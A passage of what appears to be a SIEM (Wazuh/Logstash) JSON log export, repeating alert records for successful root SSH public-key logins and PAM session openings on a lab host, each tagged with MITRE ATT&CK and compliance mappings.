sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
